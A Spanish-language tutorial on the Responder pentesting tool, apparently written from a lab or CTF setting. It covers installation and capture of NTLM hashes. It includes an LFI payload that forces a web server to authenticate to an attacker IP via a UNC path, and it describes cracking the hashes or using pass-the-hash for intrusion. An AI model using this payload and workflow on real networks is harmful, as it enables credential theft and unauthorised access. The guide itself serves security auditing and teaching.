Responder es una poderosa herramienta de pentesting utilizada para capturar credenciales en redes locales aprovechando protocolos inseguros. En esta guía, aprenderás a utilizar Responder de forma profesional, explorando sus principales funciones y cómo optimizar su uso en auditorías de seguridad.
Instalación de Responder
Yo esta herramienta la he clonado simplemente desde GitHub pero la podéis instalar también de la siguiente forma.
sudo apt update && sudo apt install responder -y
Si prefieres clonarlo desde Github como yo:
git clone https://github.com/lgandx/Responder.git
Uso Básico de Responder y Captura de Hashes NTLM
Primero deberemos de iniciar la herramienta en la interfaz adecuada que en mi caso era tun0.
Lo haremos con el siguiente comando.
sudo python3 Responder.py -I tun0
Usualmente, para la captura del hash NTLM necesitaríamos que la víctima accediese a un recurso compartido. Pero en este caso existe otra manera gracias a la vulnerabilidad LFI (Local File Inclusion), que nos permite capturar el hash de manera forzada accediendo a un directorio inexistente o a un archivo de recursos de red de la siguiente forma:
http://paginaweb/index.php?page=\\10.10.14.6\fakefile
Después de esto nos dirigiremos a los logs de la herramienta para ver los hashes capturados.
Una vez capturados podríamos intentar conectarnos a la máquina si existiese la vulnerabilidad de pass the hash o por otra parte podríamos guardar el hash en un archivo y crackearlo con la herramienta de jhon y de esta forma conseguir una contraseña y poder tener intrusión en la maquina.
Opciones Avanzadas de Responder
Responder permite ajustar su configuración en el archivo Responder.conf para definir qué servicios se activan. Por ejemplo, para desactivar SMB y capturar solo hashes HTTP:
SMB = Off
HTTP = On
Ejecutamos nuevamente Responder con parámetros avanzados:
sudo python3 Responder.py -I eth0 -rv
Donde:
- -r: Responde solo a peticiones específicas.
- -v: Muestra más detalles en la salida.
